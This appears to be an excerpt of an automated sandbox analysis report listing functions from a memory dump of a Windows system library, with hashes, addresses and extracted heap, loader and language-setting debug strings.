                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                              • API String ID: 3446177414-1745908468
                                              • Opcode ID: 0f981b5017999efe04f15ce78cfcf5c7de38d4869ee075171c5930c627d1eb00
                                              • Instruction ID: b6b5263e82c26b7a997a27378f7940cd44e74de38ca68d1fdc0dc1adb10abef2
                                              • Opcode Fuzzy Hash: 0f981b5017999efe04f15ce78cfcf5c7de38d4869ee075171c5930c627d1eb00
                                              • Instruction Fuzzy Hash: BD914236900784DFDB02CFA9C840AAEBBF2FF59794F25805AE445AB262CB35DC41CB51
                                              Function 369F12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              • Opcode ID: 6fe79cec528af479ab2de3a852e004b7fc7d487bd2e0c4914978b7e315c9cb7d
                                              • Instruction ID: 4b5c7131b0d5ac3e9716bb541684b70c8bc394824b857e1b051784c835d3a72a
                                              • Opcode Fuzzy Hash: 6fe79cec528af479ab2de3a852e004b7fc7d487bd2e0c4914978b7e315c9cb7d
                                              • Instruction Fuzzy Hash: 5812DC75A20742DFE725CF25C440BA6BFF5EF0931AF668459E4868F642D736E880CB90
                                              Function 3693D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                              • API String ID: 0-3532704233
                                              • Opcode ID: 3f41de71dea9837ce44ee58623f7ff92f30189ab099c2ae0952a2b0152b1dfed
                                              • Instruction ID: e965e5ea77e3be5c5f3a1348b525f6749137cfb542d1f242c93ee7a3a096bae0
                                              • Opcode Fuzzy Hash: 3f41de71dea9837ce44ee58623f7ff92f30189ab099c2ae0952a2b0152b1dfed
                                              • Instruction Fuzzy Hash: 4BB1ABB69093559FE711CF25C890A5BB7E8FB88758F61492EF888D7240DB70DD08CB92
                                              Function 36951070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3570731704
                                              • Opcode ID: 98b00e5ce63afe08de6f422dba338e68a0dcc60f9c9adc3176aff3ae90d09bd0
                                              • Instruction ID: b50ea0375d429f05f3030524721781c1b5c526e6dde3ae293f25cf8219e61af2
                                              • Opcode Fuzzy Hash: 98b00e5ce63afe08de6f422dba338e68a0dcc60f9c9adc3176aff3ae90d09bd0
                                              • Instruction Fuzzy Hash: 84924875E10328CFEB24CF19CC40B99BBB5AF45354F2681EADA49AB251D7309E80CF52
                                              Function 3696D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3696D959
                                                • Part of subcall function 36944859: RtlDebugPrintTimes.NTDLL ref: 369448F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1975516107
                                              • Opcode ID: 425afa8c541222edbfc734fa47acb055d196de7002e7992ecce9e6df9db57bfb
                                              • Instruction ID: f0b178ed170e77f67342b90658edbc659f77fc8a427d89cfafb986611f8b105e
                                              • Opcode Fuzzy Hash: 425afa8c541222edbfc734fa47acb055d196de7002e7992ecce9e6df9db57bfb
                                              • Instruction Fuzzy Hash: 9451DF75E043459FEB11CFAAC88478DBBB2BF483A8F344159C9107B291D774A88ACBD1
                                              Function 369D9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              • Opcode ID: 1929c77bbfe0065d9eed3b3709dd72fe8dc9c3d6096d5d297dbf328b1c5131cc
                                              • Instruction ID: ba3935418a573525e8e0d37a9b9d203055197240c25c2c39136be4a5809fd454
                                              • Opcode Fuzzy Hash: 1929c77bbfe0065d9eed3b3709dd72fe8dc9c3d6096d5d297dbf328b1c5131cc
                                              • Instruction Fuzzy Hash: 1CD190B2809315AFD721EA54C840BAFB7ECEF84754F818939FA84AB151D774C948C7D2
                                              Function 3693D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              • @, xrefs: 3693D313
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3693D196
                                              • @, xrefs: 3693D2AF
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3693D2C3
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3693D0CF
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3693D262
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3693D146
                                              • @, xrefs: 3693D0FD
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1356375266
                                              • Opcode ID: 57c9289760fa3b815e146588d98894c11bc39539a187cfb61824ccb301f79ae6
                                              • Instruction ID: a1b8ad31f5e222ab70a86046526e82d27e11c216cc570b5d9fb585eba81ac7b8
                                              • Opcode Fuzzy Hash: 57c9289760fa3b815e146588d98894c11bc39539a187cfb61824ccb301f79ae6
                                              • Instruction Fuzzy Hash: AAA15AB19093459FE321CF61C890B9BB7E8FB84759F60492EE58896241E774D90CCF93
                                              Function 3693F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              • Opcode ID: a498522ed39a7f1179596808d9cf1aaa505f38d7b4c5c21ebda523f5c89143a0
                                              • Instruction ID: 5857cde7d526f97952e1ab2d09beb2ff23c99d38fe77d9def479bd6d6113c4e7
                                              • Opcode Fuzzy Hash: a498522ed39a7f1179596808d9cf1aaa505f38d7b4c5c21ebda523f5c89143a0
                                              • Instruction Fuzzy Hash: DF422F75609781DFE310CF29C984A6ABBE9FF88348F24496DE485CB352DB34D846CB52
                                              Function 3695B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              • Opcode ID: c55481f85604e2aff6554f4345c6f4280dd01f3a08e880ab467dfbdda7048b22
                                              • Instruction ID: 2fd44adff26e7199d9fedee45de16d92bc08bbb7682af4ecb4c59c81459c09dc
                                              • Opcode Fuzzy Hash: c55481f85604e2aff6554f4345c6f4280dd01f3a08e880ab467dfbdda7048b22
                                              • Instruction Fuzzy Hash: 6FC14A71E00319ABEB24CF65CCA0B7E77B9AF45354F2640A9EA01AF285DB74CD45C392
                                              Function 36950770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              • Opcode ID: 763370a930db2826c579ec38a44852bd83a3fbc7c6feb54f7af3e5b22112489b
                                              • Instruction ID: b1f9685fa62c10ccefeafd57f8cc03426e4cc6710d257ef20eb6431ae7156067
                                              • Opcode Fuzzy Hash: 763370a930db2826c579ec38a44852bd83a3fbc7c6feb54f7af3e5b22112489b
                                              • Instruction Fuzzy Hash: 35F19874B00705DFEB15CF68C894B6AB7F9FB44348F2281A8EA059B381D734E981CB91
                                              Function 3696F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 369B02E7
                                              • RTL: Re-Waiting, xrefs: 369B031E
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 369B02BD
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: 766ffa16181af5a6032f1b697453321d79d6fb98c71e4cfcb37e39ed255141dc
                                              • Instruction ID: daac4949a8f06697696adb613aa6cb3f25bb6a4d1886db7024cc9ec152d9679f
                                              • Opcode Fuzzy Hash: 766ffa16181af5a6032f1b697453321d79d6fb98c71e4cfcb37e39ed255141dc
                                              • Instruction Fuzzy Hash: CDE1E274A087419FE721CF29C884B0AB7E5FF84368F200A5DF5A58B2E1DB74D945CB82
                                              Function 369651EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                              Download Yara Rule
                                              Strings
                                              • Kernel-MUI-Number-Allowed, xrefs: 36965247
                                              • Kernel-MUI-Language-Allowed, xrefs: 3696527B
                                              • Kernel-MUI-Language-Disallowed, xrefs: 36965352
                                              • WindowsExcludedProcs, xrefs: 3696522A
                                              • Kernel-MUI-Language-SKU, xrefs: 3696542B
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 9651fe5512c3127a93ab441208743a87da4e4f18c97768fa53001a93a8f9a5a1
                                              • Instruction ID: fce70663e86c04d5d5524f0222f3b40db5c2ae784ef339ebb20e915fc55d6510
                                              • Opcode Fuzzy Hash: 9651fe5512c3127a93ab441208743a87da4e4f18c97768fa53001a93a8f9a5a1
                                              • Instruction Fuzzy Hash: 55F12AB6D10329EFDB11CF99C980E9EBBFDAF48654F61405AE501A7211EB749E01CBA0
                                              Function 36A1B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 5f7eab0ad4e4182f9045009debe364766122c645db4c718930b236118b49219f
                                              • Instruction ID: a26d46487cfc733878f8a3f415ad75631b8f245ce7a8ccb53ad31ce81a7cdcd5
                                              • Opcode Fuzzy Hash: 5f7eab0ad4e4182f9045009debe364766122c645db4c718930b236118b49219f
                                              • Instruction Fuzzy Hash: 30F11876E006158FDB08CF69C99067EFBF6AF98210B6A416DD856EF380E634E901CB50
                                              Function 369376B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                              • API String ID: 0-3061284088
                                              • Opcode ID: 6bc1624458c0a75bdf542a1c9ec13a350ea15048fe80cc8c4a2e80254a5570a4
                                              • Instruction ID: 911148a1bb2a474ad68b00a031beeaa7dba5d87421d78249c8dfe1a77e4a2813
                                              • Opcode Fuzzy Hash: 6bc1624458c0a75bdf542a1c9ec13a350ea15048fe80cc8c4a2e80254a5570a4
                                              • Instruction Fuzzy Hash: F8014737006294DEE325CB19DD0AF937BF8DB92774F36408AE1004B65ACAACDC81CA61
                                              Function 369570C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 641768db542759a95f0cfe659a24aa6219b4b80b784abb5a5c6c0f0bea8d887c
                                              • Instruction ID: 935acb42fa2c4446e8d8beb85d8a23b94fd1d85e4e8596fddb8efa030ea7e2d4
                                              • Opcode Fuzzy Hash: 641768db542759a95f0cfe659a24aa6219b4b80b784abb5a5c6c0f0bea8d887c
                                              • Instruction Fuzzy Hash: D213BE74E00329CFEB14CF69C9847A9BBF5BF48304F2581A9DA45AB381D734A946CF91
                                              Function 3694BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$.mui$.mun$SystemResources\
                                              • API String ID: 0-3047833772
                                              • Opcode ID: b2d7d5d57c7b2ed5e391169ca6d853a110d12ca35d40a79c28df514e9f2fecb9
                                              • Instruction ID: a7382a4a8850635ed4b2e12681a2d8db44e405ecf7fed1f5cfcb2a3a134a62a0
                                              • Opcode Fuzzy Hash: b2d7d5d57c7b2ed5e391169ca6d853a110d12ca35d40a79c28df514e9f2fecb9
                                              • Instruction Fuzzy Hash: 73623A76A00329DFDB21DF55CC40BD9B7B8BB0A354F5041EAE809A7A50DB319E85CF92
                                              Function 3693F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              • Opcode ID: e162695ccae83f7cc9cfa4c945a1b0b22a007d08bec1d17b49ead3ab6fa3a49b
                                              • Instruction ID: a49061c057c89a65e8258a54cb93bc7514c3e531b65dc56ca5678733ba5629cd
                                              • Opcode Fuzzy Hash: e162695ccae83f7cc9cfa4c945a1b0b22a007d08bec1d17b49ead3ab6fa3a49b
                                              • Instruction Fuzzy Hash: 62614372205784AFE311CB25CD44F9777E8EF84758F250869FA548B292DB34DC00CBA2
                                              Function 369F11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 0-336120773
                                              • Opcode ID: 20f6d6fd01998410e3aaf5880e38b5549bf02b24a4871a26e8efdc7d028ecac2
                                              • Instruction ID: c0f302d4c16df18aa747250c5c81694ef5ad197a370bb8207905d6b685efb44a
                                              • Opcode Fuzzy Hash: 20f6d6fd01998410e3aaf5880e38b5549bf02b24a4871a26e8efdc7d028ecac2
                                              • Instruction Fuzzy Hash: BB31E076621214EFE710CB99CC81F967BE8EF0A669F320095E510DF251D632EC42CBA5
                                              Function 36939148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              • Opcode ID: 4147264f12bc6606cdbfc37c3df11dbf66b4aed8982dedb8248197ea288ff183
                                              • Instruction ID: f357f8c99767fea6cd2ff8cb630791c48cd4d5b0a7fdf7580bf396e60304988e
                                              • Opcode Fuzzy Hash: 4147264f12bc6606cdbfc37c3df11dbf66b4aed8982dedb8248197ea288ff183
                                              • Instruction Fuzzy Hash: 7E319C76A02218AFE701CB86CC84F9BB7FCEF45774F254095E914AB295EA34ED40CA61
                                              Function 36947152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 745ea6bf0022c5d22308c2ecfbee2340f4590e20e9d35eaad242459b0fd1a361
                                              • Instruction ID: 92e6bcfbfed3aee170a97c90402031bd88e01dfafa298b2ebfb18bfc77427ed1
                                              • Opcode Fuzzy Hash: 745ea6bf0022c5d22308c2ecfbee2340f4590e20e9d35eaad242459b0fd1a361
                                              • Instruction Fuzzy Hash: C951E034E00719AFFB06DB64CD58B5DBBF8BF08355F204029E502AB290EB749901CB91
                                              Function 36A13E10 Relevance: 4.6, APIs: 3, Instructions: 148timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
